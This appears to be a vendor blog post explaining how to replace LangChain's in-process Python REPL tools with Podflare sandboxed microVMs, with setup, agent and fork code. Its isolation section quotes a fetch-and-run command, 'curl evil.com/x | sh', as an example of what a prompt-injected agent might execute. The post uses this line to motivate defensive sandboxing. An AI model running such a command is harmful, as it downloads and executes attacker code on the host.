LangChain’s Tool primitive is clean, but the default code-execution tools (PythonREPLTool, PythonAstREPLTool) run inside your own Python process. That’s fine for development. For production agents running LLM-generated code, it’s a foot-gun — one prompt injection away from os.system-ing your server.

This post walks through replacing those in-process tools with a hardware-isolated Podflare sandbox, using LangChain’s DynamicStructuredTool. Full code, runs today, works with LangGraph, works with the current LangChain agent executor API.

Install

pip install langchain langchain-openai podflare
export OPENAI_API_KEY=sk-...
export PODFLARE_API_KEY=pf_live_...

The tool, using Podflare’s built-in helper

Podflare ships a LangChain adapter so you don’t have to write the StructuredTool boilerplate yourself. Import and go:

from podflare import Sandbox
from podflare.langchain import PodflareTool

sb = Sandbox()
run_python = PodflareTool(
    sandbox=sb,
    name="run_python",
    description=(
        "Execute Python code in a persistent REPL. Variables, "
        "imports, and file state carry across calls. Returns "
        "stdout and stderr from the execution."
    ),
)

PodflareTool is a BaseTool-shaped wrapper that takes a string argument code and returns the sandbox’s stdout + stderr. Drop it into any LangChain agent like any other tool.

Wire it into an agent

from langchain_openai import ChatOpenAI
from langchain.agents import AgentExecutor, create_openai_tools_agent
from langchain_core.prompts import ChatPromptTemplate

llm = ChatOpenAI(model="gpt-5", temperature=0)

prompt = ChatPromptTemplate.from_messages([
    ("system",
     "You are a senior data scientist. You have access to a Python "
     "REPL. State persists across calls — variables and imports "
     "stick. Prefer using pandas + numpy over writing loops."),
    ("human", "{input}"),
    ("placeholder", "{agent_scratchpad}"),
])

agent = create_openai_tools_agent(llm, [run_python], prompt)
executor = AgentExecutor(agent=agent, tools=[run_python], verbose=True)

result = executor.invoke({
    "input":
        "Fetch the last 10 days of SPY close prices from Yahoo "
        "Finance. Compute daily returns. Tell me the standard "
        "deviation and whether it's higher than the 30-day average."
})

print(result["output"])
sb.close()

The agent will do roughly three tool calls: fetch the data, compute returns, compute stats. Between calls, the Python process stays alive inside the same Podflare sandbox, so pandas, numpy, the fetched data, and intermediate variables all persist in globals().

Why this is more than a convenience

Three concrete wins over the default LangChain REPL tools:

1. Isolation — the model can’t hurt you

PythonREPLTool runs in your process. If the model gets prompt-injected into running subprocess.run("curl evil.com/x | sh"), that runs on your machine. With a Podflare sandbox, it runs in a disposable Podflare Pod microVM that can’t reach your host. See Why Docker isn’t enough for the full argument.

2. Real `pip install`

The model can run !pip install scikit-learn inline (or declare it as part of the tool call) and have the library available on the next turn. Your host Python environment stays clean — all installs happen inside the sandbox.

3. Fork for parallel hypotheses

Tree-of-thought, multi-attempt code synthesis, and "try 5 approaches and take the best" patterns are one line on Podflare:

children = parent.fork(n=5)  # ~80ms server-side
results = [c.run_code(strategy) for c, strategy in zip(children, strategies)]
winner = pick_best(results)
parent.merge_into(winner)   # commit winner's state back to parent
for c in children:
    c.close()

LangChain’s default REPL tool has no fork primitive — you’d have to spin up N processes and lose all the shared setup cost. Podflare’s snapshot-based fork preserves the full Python state (imports, open files, loaded DataFrames) in every child.

LangGraph-style long-running sessions

For LangGraph agents that run for hours or days and you want to resume later with the same Python state, mark the sandbox persistent:

# Day 1: create + load expensive state
sb = Sandbox(persistent=True)
sb.run_code("""
    import pandas as pd
    df = pd.read_parquet('/data/year.parquet')  # 2 GB
    model = train_model(df)
""")
space_id = sb.space_id
sb.idle()  # freezes full VM memory to disk

# Day 2: resume — `df` and `model` are still in memory
sb = Sandbox.resume(space_id)
sb.run_code("model.predict(df.sample(10))")  # no retraining

What about LangGraph’s built-in state?

LangGraph’s checkpointer handles message history across runs. It doesn’t handle live Python process state — that’s where Podflare Spaces fits. They compose: use LangGraph checkpoints for the conversational state, and a Podflare persistent Sandbox for the execution state. Neither replaces the other.

Performance

For chatty agents that make many small exec calls per turn, the hot-exec latency is what matters — and Podflare is ~46 ms p50 per call on an already-live sandbox. Compared with spinning up a Docker container per LangChain tool call (500–2000 ms), it’s an order of magnitude faster and less error-prone.

Try it

Sign up for a free Podflare account ($200 starter credit). The full working LangChain example is in PodFlare-ai/demo. Takes under a minute to go from a clean pip env to a LangChain agent running real code in a microVM.

Adding a secure code-execution tool to LangChain agents with Podflare

Install

The tool, using Podflare’s built-in helper

Wire it into an agent

Why this is more than a convenience

1. Isolation — the model can’t hurt you

2. Real `pip install`

3. Fork for parallel hypotheses

LangGraph-style long-running sessions

What about LangGraph’s built-in state?

Performance

Try it

Related reading

Keep reading

Ship an AI agent on Podflare in under a minute.

Install

The tool, using Podflare’s built-in helper

Wire it into an agent

Why this is more than a convenience

1. Isolation — the model can’t hurt you

2. Real pip install

3. Fork for parallel hypotheses

LangGraph-style long-running sessions

What about LangGraph’s built-in state?

Performance

Try it

Related reading

Keep reading

Ship an AI agent on Podflare in under a minute.

2. Real `pip install`